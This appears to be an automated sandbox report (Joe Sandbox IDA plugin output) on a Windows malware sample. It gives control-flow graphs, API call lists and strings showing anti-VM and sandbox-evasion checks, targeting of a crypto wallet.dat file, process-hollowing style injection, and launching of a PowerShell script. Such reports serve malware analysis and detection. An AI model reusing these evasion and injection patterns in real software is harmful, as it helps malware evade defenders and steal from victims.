12055->12056 12056->12054 12057 5a6f2d 12057->12040 12061 5a6f56 VariantInit SysAllocString SysAllocString 12057->12061 12059 5a6e3d SysFreeString SysAllocString 12058->12059 12062 5a6e53 SysFreeString 12059->12062 12060->12057 12064 5a6efe SysAllocString 12060->12064 12063 5a6fb8 SysFreeString VariantClear 12061->12063 12065 5a6e6a 12062->12065 12063->12040 12066 5a6f11 SysFreeString 12064->12066 12065->12060 12067 5a6e6e SysAllocString 12065->12067 12066->12057 12068 5a6f1b SysAllocString 12066->12068 12069 5a6e81 SysFreeString 12067->12069 12070 5a6f2a SysFreeString 12068->12070 12069->12060 12070->12057 12072 5a266c 12071->12072 12072->11989 12072->11990 12074 5a66da 12073->12074 12075 5a66e1 GetProcessHeap HeapAlloc 12073->12075 12102 5a64d0 12074->12102 12075->12074 12076 5a66ff MultiByteToWideChar 12075->12076 12076->12074 12078 5a6728 12079 5a672a InternetOpenW 12078->12079 12080 5a6766 InternetSetOptionW 12078->12080 12081 5a68d6 12078->12081 12079->12078 12080->12080 12082 5a677d InternetConnectW 12080->12082 12083 5a68e9 GetProcessHeap HeapFree 12081->12083 12084 5a68f1 12081->12084 12087 5a68b8 InternetCloseHandle 12082->12087 12088 5a67a1 HttpOpenRequestW 12082->12088 12083->12084 12085 5a68f8 GetProcessHeap HeapFree 12084->12085 12086 5a6900 12084->12086 12085->12086 12089 5a690f 12086->12089 12090 5a6907 GetProcessHeap HeapFree 12086->12090 12087->12078 12087->12081 12091 5a68ac 12088->12091 12092 5a67d7 InternetQueryOptionW 12088->12092 12089->11995 12090->12089 12093 5a68b2 InternetCloseHandle 12091->12093 12094 5a67fa InternetSetOptionW 12092->12094 12095 5a6810 HttpSendRequestW 12092->12095 12093->12087 12094->12095 12096 5a68a1 InternetCloseHandle 12095->12096 12100 5a6828 12095->12100 12096->12093 12097 5a6830 InternetQueryDataAvailable 12097->12100 12098 5a6868 GetProcessHeap HeapReAlloc 12101 5a6878 InternetReadFile 12098->12101 12099 5a6857 GetProcessHeap HeapAlloc 12099->12101 12100->12096 12100->12097 12100->12098 12100->12099 12101->12100 12103 5a64e0 InternetCrackUrlW 12102->12103 12105 5a6543 GetProcessHeap HeapAlloc 12103->12105 12108 5a65de 12103->12108 12107 5a656c GetProcessHeap HeapAlloc 12105->12107 12105->12108 12107->12108 12108->12078

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 0 5a8610-5a8620 call 5a9080 3 5a8622-5a8630 0->3 3->3 4 5a8632-5a8658 EnumDisplayDevicesW 3->4 5 5a86ca-5a86fe GetModuleHandleA GetProcAddress * 2 4->5 6 5a865a 4->6 8 5a8700-5a8703 5->8 9 5a8706-5a8744 ExpandEnvironmentStringsW * 2 GetFileAttributesW 5->9 7 5a8660-5a8671 StrStrIW 6->7 12 5a8677-5a8687 StrStrIW 7->12 13 5a8765-5a876d 7->13 8->9 10 5a876e-5a8770 9->10 11 5a8746-5a8748 9->11 15 5a8772 10->15 16 5a8777-5a87c4 SHGetFolderPathW * 2 PathCombineW GetFileAttributesW 10->16 11->10 14 5a874a-5a8756 GetFileAttributesW 11->14 12->13 17 5a868d-5a869d StrStrIW 12->17 14->10 18 5a8758-5a875a 14->18 15->16 20 5a87ca-5a87f2 16->20 21 5a87c6-5a87c8 16->21 17->13 19 5a86a3-5a86b3 StrStrIW 17->19 18->10 22 5a875c-5a875e 18->22 19->13 23 5a86b9-5a86c8 EnumDisplayDevicesW 19->23 24 5a87f5-5a881b PathCombineW GetFileAttributesW 20->24 21->13 21->20 22->13 25 5a8760 22->25 23->5 23->7 26 5a881d-5a881f 24->26 27 5a8825 24->27 25->13 26->27 28 5a8821-5a8823 26->28 29 5a8827-5a8837 27->29 28->29 29->24 30 5a8839-5a8842 29->30 30->13 31 5a8848-5a888a PathCombineW * 2 GetFileAttributesW 30->31 32 5a8a0e-5a8a33 PathCombineW GetFileAttributesW 31->32 33 5a8890-5a8892 31->33 35 5a8af9-5a8b1c ExpandEnvironmentStringsW GetFileAttributesW 32->35 36 5a8a39-5a8a3b 32->36 33->32 34 5a8898-5a88a4 GetFileAttributesW 33->34 34->32 39 5a88aa-5a88ac 34->39 37 5a8b1e-5a8b20 35->37 38 5a8b43-5a8ba9 GetComputerNameW GetUserNameW 35->38 36->35 40 5a8a41-5a8a6d CreateFileW 36->40 37->38 41 5a8b22-5a8b37 GetFileAttributesExW 37->41 43 5a8bb0-5a8bc2 lstrcmpW 38->43 39->32 42 5a88b2-5a88eb CreateFileW 39->42 44 5a8a6f-5a8a8e GetFileSize GetProcessHeap HeapAlloc 40->44 45 5a8ab2-5a8aba 40->45 41->38 48 5a8b39-5a8b3d 41->48 49 5a892e-5a8953 CreateFileW 42->49 50 5a88ed-5a890e GetFileSize GetProcessHeap HeapAlloc 42->50 43->13 51 5a8bc8-5a8bcd 43->51 52 5a8aa9-5a8aac CloseHandle 44->52 53 5a8a90-5a8aa6 ReadFile 44->53 46 5a8adb-5a8add 45->46 47 5a8abc-5a8ad8 lstrcmpA 45->47 54 5a8aef-5a8af3 46->54 55 5a8adf-5a8ae9 GetProcessHeap HeapFree 46->55 47->46 48->13 48->38 59 5a8998-5a89a0 49->59 60 5a8955-5a8974 GetFileSize GetProcessHeap HeapAlloc 49->60 56 5a8910-5a8924 ReadFile 50->56 57 5a8927-5a8928 CloseHandle 50->57 51->43 58 5a8bcf-5a8be3 StrStrW 51->58 52->45 53->52 54->13 54->35 55->54 56->57 57->49 58->13 63 5a8be9-5a8bf9 58->63 61 5a89d9-5a89de 59->61 62 5a89a2-5a89a6 59->62 64 5a898f-5a8992 CloseHandle 60->64 65 5a8976-5a898c ReadFile 60->65 67 5a89f0-5a89f2 61->67 68 5a89e0-5a89ea GetProcessHeap HeapFree 61->68 62->61 66 5a89a8-5a89b8 lstrcmpA 62->66 69 5a8c00-5a8c0f lstrcmpW 63->69 64->59 65->64 66->61 70 5a89ba-5a89d6 lstrcmpA 66->70 71 5a8a04-5a8a08 67->71 72 5a89f4-5a89fe GetProcessHeap HeapFree 67->72 68->67 69->13 73 5a8c15-5a8c1a 69->73 70->61 71->13 71->32 72->71 73->69 74 5a8c1c-5a8c49 GlobalMemoryStatusEx 73->74 74->13 75 5a8c4f-5a8c6a PathCombineW 74->75 76 5a8c70-5a8c7e 75->76 76->76 77 5a8c80-5a8c9a FindFirstFileW 76->77 78 5a8d92-5a8dbf GetModuleFileNameW StrStrIW 77->78 79 5a8ca0-5a8ca7 77->79 80 5a8cb0-5a8cc0 lstrcmpW 79->80 81 5a8cc6-5a8cd6 lstrcmpW 80->81 82 5a8d64-5a8d74 FindNextFileW 80->82 81->82 84 5a8cdc-5a8cee 81->84 82->80 83 5a8d7a-5a8d8c FindClose 82->83 83->13 83->78 85 5a8cf0-5a8d05 84->85 86 5a8d07-5a8d19 lstrcmpW 84->86 85->85 85->86 87 5a8d1b-5a8d25 lstrcmpW 86->87 88 5a8d27-5a8d31 lstrcmpW 86->88 87->88 89 5a8d61 87->89 90 5a8d3f-5a8d50 88->90 91 5a8d33-5a8d3d lstrcmpW 88->91 89->82 90->82 92 5a8d52-5a8d59 90->92 91->89 91->90 92->82 93 5a8d5b-5a8d5f 92->93 93->82
      APIs
      • EnumDisplayDevicesW.USER32(00000000,00000000,00000000,00000000), ref: 005A864E
      • StrStrIW.KERNELBASE(?,Hyper-V), ref: 005A866D
      • StrStrIW.SHLWAPI(?,VMWare), ref: 005A8683
      • StrStrIW.SHLWAPI(?,Parallels Display Adapter), ref: 005A8699
      • StrStrIW.SHLWAPI(?,Red Hat QXL controller), ref: 005A86AF
      • EnumDisplayDevicesW.USER32(00000000,00000001,00000348,00000000), ref: 005A86C4
      • GetModuleHandleA.KERNEL32(kernel32), ref: 005A86CF
      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 005A86E3
      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 005A86EE
      • ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxService.exe,?,00000104), ref: 005A871D
      • ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxTray.exe,?,00000104), ref: 005A8730
      • GetFileAttributesW.KERNELBASE(?), ref: 005A873F
      • GetFileAttributesW.KERNEL32(?), ref: 005A8751
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true
      • Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd
      Similarity
      • API ID: AddressAttributesDevicesDisplayEnumEnvironmentExpandFileProcStrings$HandleModule
      • String ID: Z< Z$%appdata%\Jaxx\Local Storage\wallet.dat$%systemroot%\System32\VBoxService.exe$%systemroot%\System32\VBoxTray.exe$7$Are.docx$BAIT$FORTI-PC$Files.docx$Harry Johnson$Hyper-V$Jennifer Lopez & Pitbull - On The FloorBeyonce - Halo$Joe Cage$L"Zh"Z|"Z$OpenVPN.txt$Opened.docx$PJones$Parallels Display Adapter$Paul Jones$Recently.docx$Red Hat QXL controller$Resource.txt$SFTOR-PC$STRAZNJICA.GRUBUTT$These.docx$VMWare$WDAGUtilityAccount$WILLCARTER-PC$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$d5.vc/g$doc$docx$kernel32$new songs.txt$powershell.exe$sal.rosenburg$xls$xlsx
      • API String ID: 4266617301-2859681792
      • Opcode ID: feeac03217a8293d6ab6e8652c6bf934ae28473dd53438592882123e67f5ec93
      • Instruction ID: ff3ce83028750cb7756ef2a363d569ca636a36d399127bf3cbde11f830a06599
      • Opcode Fuzzy Hash: feeac03217a8293d6ab6e8652c6bf934ae28473dd53438592882123e67f5ec93
      • Instruction Fuzzy Hash: 0C228A71900219AEEF209BA4DC4DFEEBFB8FF06710F1445A5E514E2190EB749A49DFA0
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 94 fb1300-fb1350 GetModuleHandleA VirtualAlloc 95 fb1359-fb1387 call fb6380 94->95 96 fb1352-fb1354 94->96 101 fb1395-fb13a2 95->101 97 fb16a6-fb16b3 call fb3a94 96->97 103 fb13e1-fb13f9 101->103 104 fb13a4-fb13df call fb6380 101->104 106 fb14ef-fb1528 call fb11f0 VirtualProtect 103->106 107 fb13ff-fb1406 103->107 104->101 114 fb1536-fb1543 106->114 107->106 110 fb140c-fb1417 107->110 113 fb1422-fb1429 110->113 113->106 115 fb142f-fb1463 GetModuleHandleA GetProcAddress LoadLibraryA 113->115 116 fb164a-fb1663 114->116 117 fb1549-fb1571 114->117 118 fb14ea 115->118 119 fb1469-fb1486 115->119 121 fb16a3 116->121 122 fb1665-fb1679 116->122 123 fb1593-fb15ad 117->123 124 fb1573-fb1591 VirtualFree 117->124 118->113 125 fb1488-fb148b 119->125 126 fb148e 119->126 121->97 127 fb1684-fb1688 122->127 129 fb15b8 123->129 130 fb15af-fb15b6 123->130 128 fb152a-fb1532 124->128 125->126 131 fb14a2-fb14a8 126->131 127->121 134 fb168a-fb1690 127->134 128->114 132 fb15bf-fb15c7 129->132 130->132 131->118 133 fb14aa-fb14b5 131->133 135 fb15c9-fb15d0 132->135 136 fb15d2 132->136 137 fb14b7-fb14c4 133->137 138 fb14c6-fb14d2 133->138 134->121 139 fb1692-fb16a1 134->139 140 fb15d9-fb15e2 135->140 136->140 141 fb14d5-fb14e8 GetProcAddress 137->141 138->141 139->127 143 fb15ed 140->143 144 fb15e4-fb15eb 140->144 141->131 147 fb15f4-fb1616 143->147 144->147 148 fb1618-fb1621 147->148 149 fb1624-fb163f VirtualProtect 147->149 148->149 149->116
      APIs
      • GetModuleHandleA.KERNEL32(kernel32), ref: 00FB132A
      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00FB1343
      • GetModuleHandleA.KERNEL32(kernel32,LoadLibraryA), ref: 00FB1439
      • GetProcAddress.KERNEL32(00000000), ref: 00FB1440
      • LoadLibraryA.KERNELBASE(?), ref: 00FB1459
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID: HandleModule$AddressAllocLibraryLoadProcVirtual
      • String ID: LoadLibraryA$kernel32
      • API String ID: 3393750808-970291620
      • Opcode ID: 72e8c750a7e6669d5bac5bfc5b5f540792ddabeb5d4067e3a61ff44889ea36e7
      • Instruction ID: 1717f2da36e81957ba1bae7e65edaefa52393d54212194bb17fa1289214cc813
      • Opcode Fuzzy Hash: 72e8c750a7e6669d5bac5bfc5b5f540792ddabeb5d4067e3a61ff44889ea36e7
      • Instruction Fuzzy Hash: C9D13675E00219DFCB18CF99D9A0AEEB7B2FF88304F648119E406AB395D734A981DF50
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      APIs
      • LPtoDP.GDI32(00000000,000C2BFF,020ECD74), ref: 00FB2F77
      • GetLastError.KERNEL32 ref: 00FB2F81
      • ExitProcess.KERNEL32 ref: 00FB2F8E
      • BuildCommDCBAndTimeoutsA.KERNEL32(jhl46745fghb,00000000,00000000), ref: 00FB2F9D
      • GetCurrentProcess.KERNEL32(00000000), ref: 00FB2FA9
      • TerminateProcess.KERNEL32(00000000), ref: 00FB2FB0
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID: Process$BuildCommCurrentErrorExitLastTerminateTimeouts
      • String ID: jhl46745fghb
      • API String ID: 3772419538-1856006033
      • Opcode ID: 587b9a121cc8ae08be9ef4468bc76c753a2d83f250b3c088730ac67074c35975
      • Instruction ID: 1d6336789818c4a91ed866542abc7d75cdcfdbfeaf88a33aa9797660379d1dae
      • Opcode Fuzzy Hash: 587b9a121cc8ae08be9ef4468bc76c753a2d83f250b3c088730ac67074c35975
      • Instruction Fuzzy Hash: 2B012D34A80248ABD760AFA1DE0BF9D7774BF05701F104058E506AB195DB749954AF51
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 164 5a8dc0-5a8dd7 GetUserDefaultLangID 165 5a8e6c-5a8e6e ExitProcess 164->165 166 5a8ddd-5a8de5 164->166 166->165 167 5a8deb-5a8df3 166->167 167->165 168 5a8df5-5a8dfd 167->168 168->165 169 5a8dff-5a8e07 168->169 169->165 170 5a8e09-5a8e11 169->170 170->165 171 5a8e13-5a8e1b 170->171 171->165 172 5a8e1d-5a8e25 171->172 172->165 173 5a8e27-5a8e2f 172->173 173->165 174 5a8e31-5a8e39 173->174 174->165 175 5a8e3b-5a8e43 174->175 175->165 176 5a8e45 call 5a8610 175->176 178 5a8e4a-5a8e4c 176->178 178->165 179 5a8e4e-5a8e67 call 5a8330 call 5a7160 call 5a8f20 call 5a7640 call 5a8520 178->179 179->165
      APIs
      • GetUserDefaultLangID.KERNEL32 ref: 005A8DC6
      • ExitProcess.KERNEL32 ref: 005A8E6E
        • Part of subcall function 005A8610: EnumDisplayDevicesW.USER32(00000000,00000000,00000000,00000000), ref: 005A864E
        • Part of subcall function 005A8610: StrStrIW.KERNELBASE(?,Hyper-V), ref: 005A866D
        • Part of subcall function 005A8610: StrStrIW.SHLWAPI(?,VMWare), ref: 005A8683
        • Part of subcall function 005A8610: StrStrIW.SHLWAPI(?,Parallels Display Adapter), ref: 005A8699
        • Part of subcall function 005A8610: StrStrIW.SHLWAPI(?,Red Hat QXL controller), ref: 005A86AF
        • Part of subcall function 005A8610: EnumDisplayDevicesW.USER32(00000000,00000001,00000348,00000000), ref: 005A86C4
        • Part of subcall function 005A8610: GetModuleHandleA.KERNEL32(kernel32), ref: 005A86CF
        • Part of subcall function 005A8610: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 005A86E3
        • Part of subcall function 005A8610: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 005A86EE
        • Part of subcall function 005A8610: ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxService.exe,?,00000104), ref: 005A871D
        • Part of subcall function 005A8610: ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxTray.exe,?,00000104), ref: 005A8730
        • Part of subcall function 005A8610: GetFileAttributesW.KERNELBASE(?), ref: 005A873F
        • Part of subcall function 005A8610: GetFileAttributesW.KERNEL32(?), ref: 005A8751
        • Part of subcall function 005A8330: InitializeCriticalSection.KERNEL32(005AA080), ref: 005A8352
        • Part of subcall function 005A8330: GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 005A837F
        • Part of subcall function 005A8330: StringFromGUID2.OLE32(?,?,00000080), ref: 005A83D8
        • Part of subcall function 005A8330: wsprintfA.USER32 ref: 005A83EF
        • Part of subcall function 005A8330: CreateMutexW.KERNEL32(00000000,00000001,?), ref: 005A8403
        • Part of subcall function 005A8330: GetLastError.KERNEL32 ref: 005A840E
        • Part of subcall function 005A8330: WSAStartup.WS2_32(00000202,?), ref: 005A844C
        • Part of subcall function 005A8330: CryptAcquireContextA.ADVAPI32(005AA4EC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 005A8465
        • Part of subcall function 005A8330: CryptAcquireContextA.ADVAPI32(005AA4EC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000008), ref: 005A8481
        • Part of subcall function 005A7160: ExpandEnvironmentStringsW.KERNEL32(%ProgramW6432%,?,00000104), ref: 005A7181
        • Part of subcall function 005A7160: lstrlenW.KERNEL32(?), ref: 005A718A
        • Part of subcall function 005A7160: ExpandEnvironmentStringsW.KERNEL32(%ProgramFiles%,?,00000104), ref: 005A71A5
        • Part of subcall function 005A7160: GetSystemWow64DirectoryW.KERNEL32(?,00000104), ref: 005A71B3
        • Part of subcall function 005A7160: GetLastError.KERNEL32 ref: 005A71BD
        • Part of subcall function 005A7160: ExpandEnvironmentStringsW.KERNEL32(%ProgramData%\agent.js,?,00000104), ref: 005A71D4
        • Part of subcall function 005A7160: wnsprintfW.SHLWAPI ref: 005A71EE
        • Part of subcall function 005A7160: SetFileAttributesW.KERNEL32(?,00000006), ref: 005A720E
        • Part of subcall function 005A8F20: CryptGenRandom.ADVAPI32(00000020,?), ref: 005A8F38
        • Part of subcall function 005A8F20: GetProcessHeap.KERNEL32(00000000,00000000), ref: 005A8F95
        • Part of subcall function 005A8F20: HeapFree.KERNEL32(00000000), ref: 005A8F9C
        • Part of subcall function 005A8F20: wsprintfA.USER32 ref: 005A8FCF
        • Part of subcall function 005A8F20: GetProcessHeap.KERNEL32(00000000,00000000), ref: 005A9008
        • Part of subcall function 005A8F20: HeapFree.KERNEL32(00000000), ref: 005A900B
        • Part of subcall function 005A8F20: GetProcessHeap.KERNEL32(00000000,00000000), ref: 005A9010
        • Part of subcall function 005A8F20: HeapFree.KERNEL32(00000000), ref: 005A9013
        • Part of subcall function 005A7640: LsaOpenPolicy.ADVAPI32(00000000,005AA060,00000001,?), ref: 005A767C
        • Part of subcall function 005A7640: LsaQueryInformationPolicy.ADVAPI32(?,0000000C,?), ref: 005A768F
        • Part of subcall function 005A7640: GetProcessHeap.KERNEL32(00000008,?), ref: 005A76AB
        • Part of subcall function 005A7640: HeapAlloc.KERNEL32(00000000), ref: 005A76B2
        • Part of subcall function 005A7640: LsaFreeMemory.ADVAPI32(?), ref: 005A76EC
        • Part of subcall function 005A7640: LsaClose.ADVAPI32(?), ref: 005A76F5
        • Part of subcall function 005A7640: GetComputerNameW.KERNEL32(?,?), ref: 005A7714
        • Part of subcall function 005A7640: GetUserNameW.ADVAPI32(?,00000101), ref: 005A7725
        • Part of subcall function 005A8520: ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe,?,00000104), ref: 005A8541
        • Part of subcall function 005A8520: ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe,?,00000104), ref: 005A8554
        • Part of subcall function 005A8520: ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104), ref: 005A8567
        • Part of subcall function 005A8520: GetFileAttributesW.KERNEL32(?), ref: 005A858D
        • Part of subcall function 005A8520: lstrcpyW.KERNEL32(00000000,sd4.ps1), ref: 005A85BD
        • Part of subcall function 005A8520: wnsprintfW.SHLWAPI ref: 005A85E0
        • Part of subcall function 005A8520: ShellExecuteW.SHELL32(00000000,open,?,?,00000000,00000000), ref: 005A8602
      Memory Dump Source
      • Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true
      • Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd
      Similarity
      • API ID: EnvironmentExpandHeapStrings$Process$AttributesFileFree$Crypt$AcquireAddressContextDevicesDisplayEnumErrorInformationLastNamePolicyProcUserwnsprintfwsprintf$AllocCloseComputerCreateCriticalDefaultDirectoryExecuteExitFromHandleInitializeLangMemoryModuleMutexOpenQueryRandomSectionShellStartupStringSystemVolumeWow64lstrcpylstrlen
      • String ID:
      • API String ID: 1304186597-0
      • Opcode ID: 9c3b830738af04e7596d85d951e3b779660936d6e02956b01fc0e61070ff7b0c
      • Instruction ID: b89bf33a21fb6c939c14d32db20913ce0adbdc813663354651230b6fe88e35ca
      • Opcode Fuzzy Hash: 9c3b830738af04e7596d85d951e3b779660936d6e02956b01fc0e61070ff7b0c
      • Instruction Fuzzy Hash: 3F017D5CA061068AEE34755884253BD3D4AFFC3B21FC8813A6BD64BDC59D041E87436F
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 190 fb1710-fb175a call fb1110 * 2 195 fb183f-fb1858 call fb6940 call fb3a94 190->195 196 fb1760-fb1764 190->196 196->195 197 fb176a-fb176e 196->197 197->195 199 fb1774-fb1778 197->199 199->195 201 fb177e-fb179c call fb6b68 199->201 206 fb17a7-fb17ad 201->206 207 fb17af-fb17c0 206->207 208 fb17c2-fb182b call fb16c0 call fb1300 GetPEB GetUserDefaultLangID call fb6940 206->208 207->206 215 fb1830-fb183c call fb6940 208->215 215->195
      APIs
        • Part of subcall function 00FB1110: GetModuleHandleA.KERNEL32(kernel32), ref: 00FB111B
        • Part of subcall function 00FB1110: GetModuleHandleW.KERNEL32(00000000), ref: 00FB1162
      • GetUserDefaultLangID.KERNELBASE ref: 00FB1824
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID: HandleModule$DefaultLangUser
      • String ID:
      • API String ID: 3410018322-0
      • Opcode ID: a8ec003bae38d0151cbcd2b953d72c2489502204521b5b23b3adfd11d15d4753
      • Instruction ID: 79d3d1806e7bd8fe1ce8b71a679bfd242c2b38ed84da5cc7e8884a17b1b345de
      • Opcode Fuzzy Hash: a8ec003bae38d0151cbcd2b953d72c2489502204521b5b23b3adfd11d15d4753
      • Instruction Fuzzy Hash: EF4137B5E002099FCF04DF99D895AEEB7F5BF48304F148558E505A7341DB38AA41DFA1
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      APIs
      • GetModuleHandleW.KERNEL32(ntdll), ref: 005A5E7D
      • GetProcAddress.KERNEL32(00000000,NtCreateSection), ref: 005A5E91
      • GetProcAddress.KERNEL32(00000000,NtCreateProcessEx), ref: 005A5E9C
      • GetProcAddress.KERNEL32(00000000,RtlCreateProcessParametersEx), ref: 005A5EA7
      • GetProcAddress.KERNEL32(00000000,RtlDestroyProcessParameters), ref: 005A5EB2
      • GetProcAddress.KERNEL32(00000000,NtCreateThreadEx), ref: 005A5EBD
      • GetTempPathW.KERNEL32(000000F6,?), ref: 005A5ED6
        • Part of subcall function 005A2490: GetTickCount.KERNEL32 ref: 005A2492
      • wnsprintfW.SHLWAPI ref: 005A5F11
      • PathCombineW.SHLWAPI(?,?,?), ref: 005A5F2B
      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000002,00000080,00000000), ref: 005A5F52
      • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 005A5F76
      • SetEndOfFile.KERNEL32(00000000), ref: 005A5F79
      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 005A5F86
      • wnsprintfW.SHLWAPI ref: 005A5FA4
      • RtlInitUnicodeString.NTDLL(?,?), ref: 005A5FBA
      • RtlInitUnicodeString.NTDLL(?,?), ref: 005A5FC7
      • GetCurrentProcess.KERNEL32(00000004,00000000,00000000,00000000,00000000), ref: 005A6006
      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 005A6055
      • WriteFile.KERNEL32(00000000,00000000,00000400,00000000,00000000), ref: 005A609F
      • FlushFileBuffers.KERNEL32(00000000), ref: 005A60A7
      • SetEndOfFile.KERNEL32(00000000), ref: 005A60AE
      • NtQueryInformationProcess.NTDLL ref: 005A60C3
      • ReadProcessMemory.KERNEL32(00000000,?,?,00000480,00000000), ref: 005A60EB
      • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000004), ref: 005A6142
      • WriteProcessMemory.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 005A617E
      • WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000), ref: 005A618C
      • NtClose.NTDLL ref: 005A61C5
      • NtClose.NTDLL ref: 005A61D6
      • NtClose.NTDLL ref: 005A61E0
      • CloseHandle.KERNEL32(00000000), ref: 005A61E3
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true
      • Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd
      Similarity
      • API ID: File$AddressProcProcess$CloseWrite$Memory$HandleInitPathPointerStringUnicodewnsprintf$AllocBuffersCombineCountCreateCurrentFlushInformationModuleQueryReadTempTickVirtual
      • String ID: "%s"$%08x%s$.exe$NtCreateProcessEx$NtCreateSection$NtCreateThreadEx$RtlCreateProcessParametersEx$RtlDestroyProcessParameters$ntdll
      • API String ID: 3548791621-756185880
      • Opcode ID: de2c6662b95484e4b98f5a65541e9683457f6652391fcd7c03e644a2460877f2
      • Instruction ID: 04975ec67a79d66e462d30ecda0235fc7cd5a0e543fc444528f91689b97672fc
      • Opcode Fuzzy Hash: de2c6662b95484e4b98f5a65541e9683457f6652391fcd7c03e644a2460877f2
      • Instruction Fuzzy Hash: 5AB13871A40219ABEB20DBA4CC49FAEBFBCFB09704F144065F605F7191D7B5AA44CBA4
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
